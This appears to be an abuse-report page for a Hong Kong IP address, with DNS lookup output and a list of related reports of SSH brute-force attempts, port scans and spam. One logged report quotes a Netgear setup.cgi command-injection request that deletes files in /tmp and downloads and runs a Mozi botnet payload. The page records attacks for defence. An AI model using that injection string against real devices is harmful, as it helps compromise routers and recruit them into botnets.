121.54.161.111

Basic Info

City: unknown

Region: unknown

Country: Hong Kong

Internet Service Provider: Shatin Industrial Building Block A Room 502 5/F

Hostname: unknown

Organization: unknown

Usage Type: Commercial

Comments:

Make a comment on this IP

Type	Details	Datetime
attack	Invalid user ip from 121.54.161.111 port 44610	2020-04-18 07:40:09

Comments on same subnet:

No discussion about this subnet yet..

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 121.54.161.111
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 44731
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;121.54.161.111.			IN	A

;; AUTHORITY SECTION:
.			310	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020041702 1800 900 604800 86400

;; Query time: 97 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Apr 18 07:40:06 CST 2020
;; MSG SIZE  rcvd: 118

Host info

Host 111.161.54.121.in-addr.arpa. not found: 3(NXDOMAIN)

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 111.161.54.121.in-addr.arpa: NXDOMAIN

Related IP info:

Related comments:

IP	Type	Details	Datetime
112.104.130.100	attackspambots	445/tcp [2020-07-08]1pkt	2020-07-09 01:09:12
195.218.182.224	attack	Unauthorized connection attempt from IP address 195.218.182.224 on Port 445(SMB)	2020-07-09 01:22:45
209.105.137.109	attackspambots	23/tcp [2020-07-08]1pkt	2020-07-09 01:30:31
77.28.21.136	attackspambots	1594208764 - 07/08/2020 13:46:04 Host: 77.28.21.136/77.28.21.136 Port: 445 TCP Blocked	2020-07-09 01:03:13
123.142.108.122	attack	2020-07-08 03:02:34 server sshd[47501]: Failed password for invalid user bin from 123.142.108.122 port 42840 ssh2	2020-07-09 01:00:58
139.59.10.42	attack	Coordinated SSH brute-force attack from different IPs. pam_unix(sshd:auth):	2020-07-09 01:02:26
128.199.156.146	attackbotsspam	Jul 7 22:07:22 fwservlet sshd[16512]: Invalid user renee from 128.199.156.146 Jul 7 22:07:22 fwservlet sshd[16512]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=128.199.156.146 Jul 7 22:07:24 fwservlet sshd[16512]: Failed password for invalid user renee from 128.199.156.146 port 55850 ssh2 Jul 7 22:07:24 fwservlet sshd[16512]: Received disconnect from 128.199.156.146 port 55850:11: Bye Bye [preauth] Jul 7 22:07:24 fwservlet sshd[16512]: Disconnected from 128.199.156.146 port 55850 [preauth] Jul 7 22:18:51 fwservlet sshd[16871]: Invalid user lanis from 128.199.156.146 Jul 7 22:18:51 fwservlet sshd[16871]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=128.199.156.146 Jul 7 22:18:54 fwservlet sshd[16871]: Failed password for invalid user lanis from 128.199.156.146 port 39808 ssh2 Jul 7 22:18:55 fwservlet sshd[16871]: Received disconnect from 128.199.156.146 port 39808:11: Bye Bye ........ -------------------------------	2020-07-09 01:32:51
189.212.52.43	attackspambots	81/tcp [2020-07-08]1pkt	2020-07-09 01:04:53
58.222.24.171	attackspam	Port scan: Attack repeated for 24 hours	2020-07-09 01:03:30
190.99.116.186	attackbotsspam	Jul 7 22:17:59 mxgate1 postfix/postscreen[7055]: CONNECT from [190.99.116.186]:58205 to [176.31.12.44]:25 Jul 7 22:17:59 mxgate1 postfix/dnsblog[7059]: addr 190.99.116.186 listed by domain zen.spamhaus.org as 127.0.0.4 Jul 7 22:17:59 mxgate1 postfix/dnsblog[7058]: addr 190.99.116.186 listed by domain cbl.abuseat.org as 127.0.0.2 Jul 7 22:17:59 mxgate1 postfix/dnsblog[7060]: addr 190.99.116.186 listed by domain b.barracudacentral.org as 127.0.0.2 Jul 7 22:18:05 mxgate1 postfix/postscreen[7055]: DNSBL rank 4 for [190.99.116.186]:58205 Jul x@x Jul 7 22:18:07 mxgate1 postfix/postscreen[7055]: DISCONNECT [190.99.116.186]:58205 ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=190.99.116.186	2020-07-09 01:24:51
66.240.219.133	attackspam	firewall-block, port(s): 7657/tcp	2020-07-09 00:54:15
114.235.64.144	attackspambots	/setup.cgi%3Fnext_file=netgear.cfg%26todo=syscmd%26cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear%26curpath=/%26currentsetting.htm=1	2020-07-09 01:21:35
175.24.107.214	attack	Jul 8 13:42:58 ns382633 sshd\[26990\]: Invalid user tdg from 175.24.107.214 port 35780 Jul 8 13:42:58 ns382633 sshd\[26990\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=175.24.107.214 Jul 8 13:43:01 ns382633 sshd\[26990\]: Failed password for invalid user tdg from 175.24.107.214 port 35780 ssh2 Jul 8 13:53:46 ns382633 sshd\[28794\]: Invalid user frank from 175.24.107.214 port 45500 Jul 8 13:53:46 ns382633 sshd\[28794\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=175.24.107.214	2020-07-09 01:06:48
183.165.28.243	attackbots	ssh brute force	2020-07-09 01:10:13
139.59.116.243	attackspam	Jul 8 19:23:17 santamaria sshd\[31925\]: Invalid user cxy from 139.59.116.243 Jul 8 19:23:17 santamaria sshd\[31925\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.59.116.243 Jul 8 19:23:19 santamaria sshd\[31925\]: Failed password for invalid user cxy from 139.59.116.243 port 48974 ssh2 ...	2020-07-09 01:28:28

Recently Reported IPs

60.90.193.16	170.223.124.166	119.205.26.104	61.178.145.108
221.21.255.246	176.227.142.0	3.226.237.19	189.82.33.204
65.95.97.218	18.234.181.169	186.176.4.128	88.200.94.97
63.183.157.132	198.6.26.254	112.68.89.19	49.72.211.210
97.42.234.81	179.179.79.94	75.86.59.178	5.85.86.211